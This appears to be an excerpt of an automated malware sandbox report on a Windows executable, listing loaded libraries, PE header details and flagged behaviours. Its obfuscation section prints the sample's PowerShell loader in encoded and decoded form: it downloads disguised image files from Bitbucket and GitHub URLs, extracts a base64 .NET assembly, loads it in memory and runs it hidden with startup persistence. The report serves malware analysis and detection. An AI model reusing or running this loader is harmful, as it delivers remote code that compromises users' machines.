        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: GdGXG0bnxH.exeStatic PE information: Image base 0x140000000 > 0x60000000
        Source: GdGXG0bnxH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: GdGXG0bnxH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: GdGXG0bnxH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: GdGXG0bnxH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: GdGXG0bnxH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: GdGXG0bnxH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: GdGXG0bnxH.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: GdGXG0bnxH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: wextract.pdb source: GdGXG0bnxH.exe
        Source: Binary string: wextract.pdbGCTL source: GdGXG0bnxH.exe
        Source: Binary string: C:\Users\Administrator\source\repos\testpowershell\testpowershell\obj\Debug\testpowershell.pdb source: powershell.exe, 0000000B.00000002.1496797841.0000024985320000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.000002498DFF2000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: n.pdb{ source: powershell.exe, 0000000B.00000002.1497283898.0000024986DC9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: s\dll\System.Core.pdbn source: powershell.exe, 0000000B.00000002.1497238738.0000024986D66000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\Administrator\source\repos\testpowershell\testpowershell\obj\Debug\testpowershell.pdbG_a_ S__CorExeMainmscoree.dll source: powershell.exe, 0000000B.00000002.1496797841.0000024985320000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.000002498DFF2000.00000004.00000800.00020000.00000000.sdmp
        Source: GdGXG0bnxH.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: GdGXG0bnxH.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: GdGXG0bnxH.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: GdGXG0bnxH.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: GdGXG0bnxH.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

        Data Obfuscation

        barindex
        Found suspicious powershell code related to unpacking or dynamic code loading
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $sodigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$g$D0$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$I$$k$
        Suspicious powershell command line found
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sodigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.IkIhcga/sdaolnwod/sfwqeqw/twqewqe/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sodigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$DJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.IkIhcga/sdaolnwod/sfwqeqw/twqewqe/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -execJump to behavior
        Source: GdGXG0bnxH.exeStatic PE information: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
